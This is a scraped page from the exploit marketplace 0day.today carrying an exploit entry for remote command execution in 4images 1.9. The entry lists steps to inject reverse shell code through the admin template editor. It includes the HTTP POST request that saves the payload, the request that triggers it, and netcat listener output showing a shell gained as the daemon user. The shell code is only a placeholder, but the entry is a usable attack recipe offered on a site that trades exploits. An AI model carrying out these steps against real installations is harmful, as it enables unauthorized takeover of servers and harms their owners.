0day.today - Biggest Exploit Database in the World.
![](/img/logo_green.jpg)
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earnGOLD
Administration of this site uses the official contacts. Beware of impostors!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ [email protected] ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
4images 1.9 Remote Command Execution Vulnerability
# Exploit Title: 4images 1.9 - Remote Command Execution # Exploit Author: Andrey Stoykov # Software Link: https://www.4homepages.de/download-4images # Version: 1.9 # Tested on: Ubuntu 20.04 To reproduce do the following: 1. Login as administrator user 2. Browse to "General" -> " Edit Templates" -> "Select Template Pack" -> "default_960px" -> "Load Theme" 3. Select Template "categories.html" 4. Paste reverse shell code 5. Click "Save Changes" 6. Browse to "http://host/4images/categories.php?cat_id=1" // HTTP POST request showing reverse shell payload POST /4images/admin/templates.php HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0 [...] __csrf=c39b7dea0ff15442681362d2a583c7a9&action=savetemplate&content=[REVERSE_SHELL_CODE]&template_file_name=categories.html&template_folder=default_960px[...] // HTTP redirect response to specific template GET /4images/categories.php?cat_id=1 HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0 [...] # nc -kvlp 4444 listening on [any] 4444 ... connect to [127.0.0.1] from localhost [127.0.0.1] 43032 Linux kali 6.0.0-kali3-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.0.7-1kali1 (2022-11-07) x86_64 GNU/Linux 13:54:28 up 2:18, 2 users, load average: 0.09, 0.68, 0.56 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT kali tty7 :0 11:58 2:18m 2:21 0.48s xfce4-session kali pts/1 - 11:58 1:40 24.60s 0.14s sudo su uid=1(daemon) gid=1(daemon) groups=1(daemon) /bin/sh: 0: can't access tty; job control turned off $ # 0day.today [2024-06-30] #